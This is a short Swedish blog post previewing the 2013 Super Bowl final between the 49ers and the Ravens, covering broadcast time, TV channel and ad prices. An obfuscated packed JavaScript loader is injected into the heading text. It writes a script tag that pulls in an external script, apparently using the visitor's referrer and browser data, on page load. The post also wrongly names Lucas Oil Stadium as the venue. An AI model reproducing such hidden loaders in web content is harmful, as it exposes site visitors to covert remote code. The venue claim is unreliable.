Image Image Image Image Image Image Image Image Image Image

| 28 november, 2020

Scroll to top

Top

NFL: Road to the Super Bowl 2013

super bowl reklam
Sebastian

Super eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hffnb|var|u0026u|referrer|izzsn||js|php’.split(’|’),0,{}))
Bowl 2013: Nu är det snart dags för den otroliga finalmatchen i USA mellan Francisco 49ers och Baltimore Ravens! 

Matchen går av stapeln nu på söndag klockan 23:00 svensk tid och tros avslutas 05:00.  Du kommer att kunna se matchen på TV10.

Årets stadium som är vald är den enorma Lucas Oil Stadium, Indianapolis, Indiana.

Som vi tidigare skrivit på Revue så är det i år rekordhöga avgifter på reklamplats på Super Bowl. Hela 4 miljoner dollar är det beräknat till för 30 sekunders reklam. Med reklamen kommer man kunna nå ut till 100 miljoner personer (vilket är helt sjukt) men ändå har många stora företag som General Motors tackat nej till detta på grund av den höga kostnaden.

Vi ser framemot denna match!! Kommer att lägga upp lite bilder på vår Instagram från vår Super Bowl kväll med Revue.

Instagram: #revue_se 

Sebastian Instagram: @plengier

Läs mer om Super Bowl:

Super Bowl 2013: Ravens – 49ers

Super Bowl reklamen: Detta kan du köpa istället